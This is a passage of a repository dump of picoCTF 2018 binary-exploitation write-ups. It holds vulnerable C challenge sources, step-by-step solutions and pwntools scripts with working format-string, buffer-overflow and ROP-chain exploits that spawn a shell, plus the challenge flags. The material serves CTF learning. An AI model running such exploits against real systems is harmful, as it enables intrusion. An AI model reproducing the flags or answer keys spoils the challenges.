[
  {
    "path": ".gitmodules",
    "content": "[submodule \"Binary Exploitation/can-you-gets-me/solution/ROPgadget\"]\n\tpath = Binary Exploitation/can-you-gets-me/solution/ROPgadget\n\turl = https://github.com/JonathanSalwan/ROPgadget.git\n[submodule \"Cryptography/Super Safe RSA/solution/msieve\"]\n\tpath = Cryptography/Super Safe RSA/solution/msieve\n\turl = https://github.com/radii/msieve.git\n[submodule \"Cryptography/Super Safe RSA 3/solution/msieve\"]\n\tpath = Cryptography/Super Safe RSA 3/solution/msieve\n\turl = https://github.com/radii/msieve.git\n"
  },
  {
    "path": "Binary Exploitation/are you root?/README.md",
    "content": "# are you root?\nPoints: 550\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you get root access through this [service](files/auth) and get the flag? Connect with `nc 2018shell1.picoctf.com 29508`. [Source](files/auth.c). \n\n### Hint\n>If only the program used calloc to zero out the memory..\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Binary Exploitation/are you root?/files/auth.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n\ntypedef enum auth_level {\n  ANONYMOUS = 1,\n  GUEST = 2,\n  USER = 3,\n  ADMIN = 4,\n  ROOT = 5\n} auth_level_t;\n  \nstruct user {\n  char *name;\n  auth_level_t level;\n};\n\nvoid give_flag(){\n  char flag[48];\n  FILE *f = fopen(\"flag.txt\", \"r\");\n  if (f == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  if ((fgets(flag, 48, f)) == NULL){\n    puts(\"Couldn't read flag file.\");\n    exit(1);\n  };\n  \n  puts(flag);\n  fclose(f);\n}\n\nvoid menu(){\n  puts(\"Available commands:\");\n  puts(\"\\tshow - show your current user and authorization level\");\n  puts(\"\\tlogin [name] - log in as [name]\");\n  puts(\"\\tset-auth [level] - set your authorization level (must be below 5)\");\n  puts(\"\\tget-flag - print the flag (requires authorization level 5)\");\n  puts(\"\\treset - log out and reset authorization level\");\n  puts(\"\\tquit - exit the program\");\n}\n\nint main(int argc, char **argv){\n  char buf[512];\n  char *arg;\n  uint32_t level;\n  struct user *user;\n\n  setbuf(stdout, NULL);\n\n  menu();\n\n  user = NULL;\n  while(1){\n    puts(\"\\nEnter your command:\");\n    putchar('>'); putchar(' ');\n\n    if(fgets(buf, 512, stdin) == NULL)\n      break;\n\n    if (!strncmp(buf, \"show\", 4)){\n      if(user == NULL){\n\tputs(\"Not logged in.\");\n      }else{\n\tprintf(\"Logged in as %s [%u]\\n\", user->name, user->level);\n      }\n\n    }else if (!strncmp(buf, \"login\", 5)){\n      if (user != NULL){\n\tputs(\"Already logged in. Reset first.\");\n\tcontinue;\n      }\n\n      arg = strtok(&buf[6], \"\\n\");\n      if (arg == NULL){\n\tputs(\"Invalid command\");\n\tcontinue;\n      }\n\n      user = (struct user *)malloc(sizeof(struct user));\n      if (user == NULL) {\n\tputs(\"malloc() returned NULL. 
Out of Memory\\n\");\n\texit(-1);\n      }\n      user->name = strdup(arg);\n      printf(\"Logged in as \\\"%s\\\"\\n\", arg);\n\n    }else if(!strncmp(buf, \"set-auth\", 8)){\n      if(user == NULL){\n\tputs(\"Login first.\");\n\tcontinue;\n      }\n\n      arg = strtok(&buf[9], \"\\n\");\n      if (arg == NULL){\n\tputs(\"Invalid command\");\n\tcontinue;\n      }\n\n      level = strtoul(arg, NULL, 10);\n\n      if (level >= 5){\n\tputs(\"Can only set authorization level below 5\");\n\tcontinue;\n      }\n\n      user->level = level;\n      printf(\"Set authorization level to \\\"%u\\\"\\n\", level);\n\n    }else if(!strncmp(buf, \"get-flag\", 8)){\n      if (user == NULL){\n\tputs(\"Login first!\");\n\tcontinue;\n      }\n\n      if (user->level != 5){\n\tputs(\"Must have authorization level 5.\");\n\tcontinue;\n      }\n\n      give_flag();\n    }else if(!strncmp(buf, \"reset\", 5)){\n      if (user == NULL){\n\tputs(\"Not logged in!\");\n\tcontinue;\n      }\n\n      free(user->name);\n      user = NULL;\n\n      puts(\"Logged out!\");\n    }else if(!strncmp(buf, \"quit\", 4)){\n      return 0;\n    }else{\n      puts(\"Invalid option\");\n      menu();\n    }\n  }\n}\n"
  },
  {
    "path": "Binary Exploitation/authenticate/README.md",
    "content": "# authenticate\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you [authenticate](files/auth) to this service and get the flag? Connect with nc 2018shell1.picoctf.com 27114. [Source](files/auth.c).  \n\n### Hint\n>What happens if you say something OTHER than yes or no?\n\n## Solution\nLooking at the source code, there appears to be some sort of authentication service, with no actual way to authenticate.\n\nWe can see that there's an _authenticated_ variable, which is set to _0_, and never changed anywhere in the code. We also notice that there is possibly a form of format string vulnerability.\n\n```c\nint main(int argc, char **argv) {\n\tchar buf[64];\n\tprintf(\"Would you like to read the flag? (yes/no)\\n\");\n\n\tfgets(buf, sizeof(buf), stdin);\n\n\tif (strstr(buf, \"no\") != NULL) {\n\t\tprintf(\"Okay, Exiting...\\n\");\n\t\texit(1);\n\t}\n\telse if (strstr(buf, \"yes\") == NULL) {\n\t\tputs(\"Received Unknown Input:\\n\");\n\t\tprintf(buf); // Format String Vulnerability\n\t} \n\tread_flag();\n}\n```\n\nWe can try running the binary and inputting _%x_ to see if any values from the stack leaks.\n\n```\n$ ./auth \nWould you like to read the flag? (yes/no)\n%x%x\nReceived Unknown Input:\n\n80489a6f7f235c0\nSorry, you are not *authenticated*!\n```\n\nLet's find out where the authenticated varialbe is located and its corresponding value.\n\n```\n[0x08048560]> s obj.authenticated \n[0x0804a04c]> px 4\n- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF\n0x0804a04c  0000 0000                                ....\n[0x0804a04c]> s\n0x804a04c\n```\n\nLooks like it's located at _0x804a04c_ with a value of _0_. Let's craft an exploit. We add characters with familiar know hex values followed by multiple _%x_\n\n```\n$ ./auth \nWould you like to read the flag? 
(yes/no)\nAAAA %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x\nReceived Unknown Input:\n\nAAAA 80489a6 f7f5b5c0 804875a 0 c30000 0 fffd3ff4 0 0 0 41414141 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 Sorry, you are not *authenticated*!\n```\n\nLooks like the 11th _%x_ did the trick. Now substitue _AAAA_ with the little endian values of the _authenticated_ variable's address and all the _%x_ with _%11$n_. This will overwrite the value of _authenticated_.\n\nSend the exploit to the service and get the flag.\n\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{y0u_4r3_n0w_aUtH3nt1c4t3d_742b49a4}`\n"
  },
  {
    "path": "Binary Exploitation/authenticate/files/auth.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n#include <sys/types.h>\n\nint authenticated = 0;\n\nint flag() {\n  char flag[48];\n  FILE *file;\n  file = fopen(\"flag.txt\", \"r\");\n  if (file == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fgets(flag, sizeof(flag), file);\n  printf(\"%s\", flag);\n  return 0;\n}\n\nvoid read_flag() {\n  if (!authenticated) {\n    printf(\"Sorry, you are not *authenticated*!\\n\");\n  }\n  else {\n    printf(\"Access Granted.\\n\");\n    flag();\n  }\n\n}\n\nint main(int argc, char **argv) {\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n\n  char buf[64];\n  \n  // Set the gid to the effective gid\n  // this prevents /bin/sh from dropping the privileges\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n  \n  printf(\"Would you like to read the flag? (yes/no)\\n\");\n\n  fgets(buf, sizeof(buf), stdin);\n  \n  if (strstr(buf, \"no\") != NULL) {\n    printf(\"Okay, Exiting...\\n\");\n    exit(1);\n  }\n  else if (strstr(buf, \"yes\") == NULL) {\n    puts(\"Received Unknown Input:\\n\");\n    printf(buf);\n  }\n  \n  read_flag();\n\n}\n"
  },
  {
    "path": "Binary Exploitation/authenticate/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\nfrom time import sleep\nimport re\n\nauth_addr = p32(0x0804a04c)\nexploit =  auth_addr + '%11$n'\n\nlog.info('Exploit created')\n\ns = remote('2018shell1.picoctf.com', 27114)\nprint s.recv()\nlog.info('Sending exploit...')\ns.sendline(exploit)\nsleep(0.5)\nlog.info('Sent!')\nflag = s.recv()\n\nlog.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 0/README.md",
    "content": "# buffer overflow 0\nPoints: 150\n\n## Category\nBinary Exploitation\n\n## Question\n>Let's start off simple, can you overflow the right buffer in this [program](files/vuln) to get the flag? You can also find it in /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d on the shell server. [Source](files/vuln.c). \n\n### Hint\n>How can you trigger the flag to print?\n>\n>If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.\n\n## Solution\nWe can try pwning the binary locally first. Firstly, create a file _flag.txt_ and add some contents into it.\n\nDo a sample run of the program.\n\n```\n$ ./vuln \nThis program takes 1 argument.\n```\n\nOk, now we try with an argument\n\n```\n$ ./vuln AAAA\nThanks! Received: AAAA\n```\n\nSeems like it's redirecting the input into output. Let's take a look at the source code.\n\n```c\n// Imports here...\n// Define flag size here...\nvoid sigsegv_handler(int sig) {\n\tfprintf(stderr, \"%s\\n\", flag);\n\tfflush(stderr);\n\texit(1);\n}\n\nvoid vuln(char *input){\n\tchar buf[16];\n\tstrcpy(buf, input);\n}\n\nint main(int argc, char **argv){\n\t// Reading flag here...\n\tsignal(SIGSEGV, sigsegv_handler);\n\t// gid settings here...\n\tif (argc > 1) {\n\t\tvuln(argv[1]);\n\t\tprintf(\"Thanks! Received: %s\", argv[1]);\n\t}\n\telse\n\t\tprintf(\"This program takes 1 argument.\\n\");\n\treturn 0;\n}\n```\n\nIt looks like the `signal(SIGSEGV, sigsegv_handler)` redirects execution to `sigsegv_handler()` and prints the flag.\n\nIn `vuln()`, there is no boundary checking, so even though there is only space for 16 bytes, it `strcpy()` will keep inserting bytes into `buf`.\n\nWe can try running the program again, but this time, with a lot more characters.\n\n```\n$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA\npicoCTF{sample_flag}\n```\n\nWe did it locally! 
It takes 28 or more bytes to leak out the flag.\n\nAll we have to do is send it to the webshell.\n\n```\n$ /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA\npicoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 0/files/vuln.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <signal.h>\n\n#define FLAGSIZE_MAX 64\n\nchar flag[FLAGSIZE_MAX];\n\nvoid sigsegv_handler(int sig) {\n  fprintf(stderr, \"%s\\n\", flag);\n  fflush(stderr);\n  exit(1);\n}\n\nvoid vuln(char *input){\n  char buf[16];\n  strcpy(buf, input);\n}\n\nint main(int argc, char **argv){\n  \n  FILE *f = fopen(\"flag.txt\",\"r\");\n  if (f == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n  fgets(flag,FLAGSIZE_MAX,f);\n  signal(SIGSEGV, sigsegv_handler);\n  \n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n  \n  if (argc > 1) {\n    vuln(argv[1]);\n    printf(\"Thanks! Received: %s\", argv[1]);\n  }\n  else\n    printf(\"This program takes 1 argument.\\n\");\n  return 0;\n}\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 0/solution/flag.txt",
    "content": "picoCTF{sample_flag}"
  },
  {
    "path": "Binary Exploitation/buffer overflow 0/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\nexploit = 'A' * 28\n\npy = s.run('cd /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d; ./vuln {}'.format(exploit))\nprint py.recv()\ns.close()\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 1/README.md",
    "content": "# buffer overflow 1\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>Okay now you're cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78 on the shell server. Source. \n\n### Hint\n>This time you're actually going to have to control that return address!\n>\n>Make sure you consider Big Endian vs Little Endian.\n\n## Solution\nBefore looking at the source code, we can run the program first.\n\n```\n$ ./vuln \nPlease enter your string: \nAAAA\nOkay, time to return... Fingers Crossed... Jumping to 0x80486b3\n```\n\nLooks like it takes in an input, and jumps to an address. Let's look at the source code now.\n\n```c\n// Imports here...\n#define BUFSIZE 32\n#define FLAGSIZE 64\n\nvoid win() {\n\tchar buf[FLAGSIZE];\n\tFILE *f = fopen(\"flag.txt\",\"r\");\n\t// Reading flag file\n\tprintf(buf);\n}\n\nvoid vuln(){\n\tchar buf[BUFSIZE];\n\tgets(buf);\n\n\tprintf(\"Okay, time to return... Fingers Crossed... Jumping to 0x%x\\n\", get_return_address());\n}\n\nint main(int argc, char **argv){\n\t// Unimportant stuff\n\tputs(\"Please enter your string: \");\n\tvuln();\n\treturn 0;\n}\n```\n\nWe can see that the address that it shows us is the return address, which should be the address of _main_. If we do a buffer overflow, we can take control of the return address, and let the program jump to wherever we want.\n\nIn this case, we would like to jump to the _win_ function, which prints out the flag.\n\nLet's try spamming the program again to see if our hunch is correct.\n\n```\n$ ./vuln \nPlease enter your string: \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nOkay, time to return... Fingers Crossed... Jumping to 0x41414141\nSegmentation fault\n```\n\nThe return address has been overwritten to _0x41414141_, which is the hex value of _A_. 
As long as we can find the correct amount of padding, we can control the where the return pointer returns to.\n\nWe can use the [De Bruijn sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence), which will find the padding we need. We will use _pwntools_.\n\n```python\n>>> from pwn import *\n>>> cyclic(100)\n'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'\n```\n\nWe can now feed that string into the program and see what address the program jumps to.\n\n```\n$ ./vuln \nPlease enter your string: \naaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa\nOkay, time to return... Fingers Crossed... Jumping to 0x6161616c\nSegmentation fault\n```\n\nOk, it jumps to _0x6161616c_. We can use `cyclic_find()` to find the offset. First we convert the hex back into ASCII. Remember that this is in little endian format. `p32()` just converts the hex back into ASCII in little endian format.\n\n```python\n>>> from pwn import *\n>>> cyclic_find(p32(0x6161616c))\n44\n```\n\nNow we know the amount of padding required. Let's test it again, with 44 'A's, and another 4 'B's. We should expect the address to show _0x41414141_.\n\n```\n$ ./vuln \nPlease enter your string: \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\nOkay, time to return... Fingers Crossed... Jumping to 0x42424242\nSegmentation fault\n```\n\nJust as we expected. 
All that's left to do is to replace _BBBB_ with the ASCII values that corresponds to the address of the _win_ function.\n\n\n```python\n>>> from pwn import *\n>>> vuln = ELF('./vuln')\n[*] '/root/Desktop/picoCTF/Binary Exploitation/buffer overflow 1/solution/vuln'\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX disabled\n    PIE:      No PIE (0x8048000)\n    RWX:      Has RWX segments\n>>> p32(vuln.symbols['win']) # Get address of win function\n'\\xcb\\x85\\x04\\x08'\n>>> 'A' * 44 + '\\xcb\\x85\\x04\\x08'\n'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\xcb\\x85\\x04\\x08'\n```\n\nOf course, we cannot type _\\xcb\\x85\\x04\\x08_ in ASCII format, so all we have to do is have Python output this string, and pipe it into the program _vuln_.\n\n```\n$ python -c \"from pwn import *; print 'A' * 44 + '\\xcb\\x85\\x04\\x08'\" | ./vuln \nPlease enter your string: \nOkay, time to return... Fingers Crossed... Jumping to 0x80485cb\npicoCTF{sample_flag}\nSegmentation fault\n```\n\nGreat! It works locally, all we have to do now is run it on the web shell.\n\n```\n$ cd /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78\n$ python -c \"from pwn import *; print 'A' * 44 + '\\xcb\\x85\\x04\\x08'\" | ./vuln\nPlease enter your string: \nOkay, time to return... Fingers Crossed... Jumping to 0x80485cb\npicoCTF{addr3ss3s_ar3_3asy65489706}Segmentation fault\n```\n\nAnd we get the flag!\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{addr3ss3s_ar3_3asy65489706}`\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 1/files/flag.txt",
    "content": "picoCTF{addr3ss3s_ar3_3asy65489706}\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 1/files/vuln.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include \"asm.h\"\n\n#define BUFSIZE 32\n#define FLAGSIZE 64\n\nvoid win() {\n  char buf[FLAGSIZE];\n  FILE *f = fopen(\"flag.txt\",\"r\");\n  if (f == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fgets(buf,FLAGSIZE,f);\n  printf(buf);\n}\n\nvoid vuln(){\n  char buf[BUFSIZE];\n  gets(buf);\n\n  printf(\"Okay, time to return... Fingers Crossed... Jumping to 0x%x\\n\", get_return_address());\n}\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n\n  puts(\"Please enter your string: \");\n  vuln();\n  return 0;\n}\n\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 1/solution/flag.txt",
    "content": "picoCTF{sample_flag}\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 1/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\nimport os\n\nPATH = os.path.dirname(os.path.realpath(__file__))\n\nUSER = 'Platy' # Change username accordingly.\n\nvuln = ELF(PATH + '/vuln')\n\npadding = 'A' * 44\npayload = p32(vuln.symbols['win'])\n\nexploit = padding + payload\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\npy = s.run('cd /problems/buffer-overflow-1_3_af8f83fb19a7e2c98e28e325e4cacf78; ./vuln')\nprint py.recv()\npy.sendline(exploit)\nprint py.recv()\ns.close()\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 2/README.md",
    "content": "# buffer overflow 2\nPoints: 250\n\n## Category\nBinary Exploitation\n\n## Question\n>Alright, this time you'll need to control some arguments. Can you get the flag from this [program](files/vuln)? You can find it in /problems/buffer-overflow-2_0_738235740acfbf7941e233ec2f86f3b4 on the shell server. [Source](files/vuln.c). \n\n### Hint\n>Try using gdb to print out the stack once you write to it!\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\n\n### Flag\n`picoCTF{addr3ss3s_ar3_3asyada28e9b}`\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 2/files/flag.txt",
    "content": "picoCTF{addr3ss3s_ar3_3asyada28e9b}\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 2/files/vuln.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 100\n#define FLAGSIZE 64\n\nvoid win(unsigned int arg1, unsigned int arg2) {\n  char buf[FLAGSIZE];\n  FILE *f = fopen(\"flag.txt\",\"r\");\n  if (f == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fgets(buf,FLAGSIZE,f);\n  if (arg1 != 0xDEADBEEF)\n    return;\n  if (arg2 != 0xDEADC0DE)\n    return;\n  printf(buf);\n}\n\nvoid vuln(){\n  char buf[BUFSIZE];\n  gets(buf);\n  puts(buf);\n}\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n\n  puts(\"Please enter your string: \");\n  vuln();\n  return 0;\n}\n\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 2/solution/solve.py",
    "content": "#!/usr/bin/python\n\nfrom pwn import *\n\nvuln = ELF('./vuln')\npadding = 'A' * 112\npayload = p32(vuln.symbols['win'])\n\nexploit = padding + payload + asm('nop') * 4 + p32(0xDEADBEEF) + p32(0xDEADC0DE)\n\ns = ssh(host='2018shell1.picoctf.com', user='Platy')\n\npy = s.run('cd /problems/buffer-overflow-2_0_738235740acfbf7941e233ec2f86f3b4; ./vuln')\nprint py.recv()\npy.sendline(exploit)\nprint py.recv()\ns.close()\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 3/README.md",
    "content": "# buffer overflow 3\nPoints: 450\n\n## Category\nBinary Exploitation\n\n## Question\n>It looks like Dr. Xernon added a stack canary to this [program](files/vuln) to protect against buffer overflows. Do you think you can bypass the protection and get the flag? You can find it in /problems/buffer-overflow-3_3_6bcc2aa22b2b7a4a7e3ca6b2e1194faf. [Source](files/vuln.c). \n\n### Hint\n>Maybe there's a smart way to brute-force the canary?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Binary Exploitation/buffer overflow 3/files/vuln.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <wchar.h>\n#include <locale.h>\n\n#define BUFSIZE 32\n#define FLAGSIZE 64\n#define CANARY_SIZE 4\n\nvoid win() {\n  char buf[FLAGSIZE];\n  FILE *f = fopen(\"flag.txt\",\"r\");\n  if (f == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fgets(buf,FLAGSIZE,f);\n  puts(buf);\n  fflush(stdout);\n}\n\nchar global_canary[CANARY_SIZE];\nvoid read_canary() {\n  FILE *f = fopen(\"canary.txt\",\"r\");\n  if (f == NULL) {\n    printf(\"Canary is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fread(global_canary,sizeof(char),CANARY_SIZE,f);\n  fclose(f);\n}\n\nvoid vuln(){\n   char canary[CANARY_SIZE];\n   char buf[BUFSIZE];\n   char length[BUFSIZE];\n   int count;\n   int x = 0;\n   memcpy(canary,global_canary,CANARY_SIZE);\n   printf(\"How Many Bytes will You Write Into the Buffer?\\n> \");\n   while (x<BUFSIZE) {\n      read(0,length+x,1);\n      if (length[x]=='\\n') break;\n      x++;\n   }\n   sscanf(length,\"%d\",&count);\n\n   printf(\"Input> \");\n   read(0,buf,count);\n\n   if (memcmp(canary,global_canary,CANARY_SIZE)) {\n      printf(\"*** Stack Smashing Detected *** : Canary Value Corrupt!\\n\");\n      exit(-1);\n   }\n   printf(\"Ok... Now Where's the Flag?\\n\");\n   fflush(stdout);\n}\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n  // Set the gid to the effective gid\n  // this prevents /bin/sh from dropping the privileges\n  int i;\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n  read_canary();\n  vuln();\n  return 0;\n}\n"
  },
  {
    "path": "Binary Exploitation/can-you-gets-me/README.md",
    "content": "# can-you-gets-me\nPoints: 650\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you exploit the following [program](files/gets) to get a flag? You may need to think return-oriented if you want to program your way to the flag. You can find the program in /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d on the shell server. [Source](files/gets.c). \n\n### Hint\n>This is a classic gets ROP\n\n## Solution\nFirst, find out the padding required for the buffer overflow. Then, use a rop chain to get the flag.\n\nROP chain generated by [ROPgadget](https://github.com/JonathanSalwan/ROPgadget).\n\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{rOp_yOuR_wAY_tO_AnTHinG_700e9c8e}`\n"
  },
  {
    "path": "Binary Exploitation/can-you-gets-me/files/gets.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 16\n\nvoid vuln() {\n  char buf[16];\n  printf(\"GIVE ME YOUR NAME!\\n\");\n  return gets(buf);\n\n}\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n\n  // Set the gid to the effective gid\n  // this prevents /bin/sh from dropping the privileges\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n  vuln();\n  \n}\n"
  },
  {
    "path": "Binary Exploitation/can-you-gets-me/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\npadding = 'A' * 28\n# execve generated by ROPgadget\nrop_gadgets = p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea060) # @ .data\nrop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret\nrop_gadgets += '/bin'\nrop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret\nrop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea064) # @ .data + 4\nrop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret\nrop_gadgets += '//sh'\nrop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret\nrop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea068) # @ .data + 8\nrop_gadgets += p32(0x08049303) # xor eax, eax ; ret\nrop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret\nrop_gadgets += p32(0x080481c9) # porop_gadgets ebx ; ret\nrop_gadgets += p32(0x080ea060) # @ .data\nrop_gadgets += p32(0x080de955) # porop_gadgets ecx ; ret\nrop_gadgets += p32(0x080ea068) # @ .data + 8\nrop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret\nrop_gadgets += p32(0x080ea068) # @ .data + 8\nrop_gadgets += p32(0x08049303) # xor eax, eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0807a86f) # inc eax ; ret\nrop_gadgets += p32(0x0806cc25) # int 0x80\n\nexploit = padding + rop_gadgets\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\npy = s.run('cd 
/problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d; ./gets')\nprint py.recv()\npy.sendline(exploit)\npy.sendline('cat flag.txt')\nprint py.recv()\npy.interactive()\n"
  },
  {
    "path": "Binary Exploitation/echo back/README.md",
    "content": "# echo back\nPoints: 500\n\n## Category\nBinary Exploitation\n\n## Question\nThis [program](files/echoback) we found seems to have a vulnerability. Can you get a shell and retreive the flag? Connect to it with `nc 2018shell1.picoctf.com 22462`.\n\n### Hint\n>hmm, printf seems to be dangerous...\n>\n>You may need to modify more than one address at once.\n>\n>Ever heard of the Global Offset Table?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Binary Exploitation/echo back/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\n\ncontext.log_level = 'error'\n\nechoback = ELF('./echoback')\n\nputs_got_addr = echoback.got['puts']\nsystem_got_addr = p32(echoback.got['system'])\n\npayload = '%59348x%8$n'\npayload += '%4095x%9$n'\n\nprint \"sh;#\" + p32(puts_got_addr) + p32(puts_got_addr + 2) + payload\n\n# 0x804a020\n# 0xf7e0e7e0\n"
  },
  {
    "path": "Binary Exploitation/echooo/README.md",
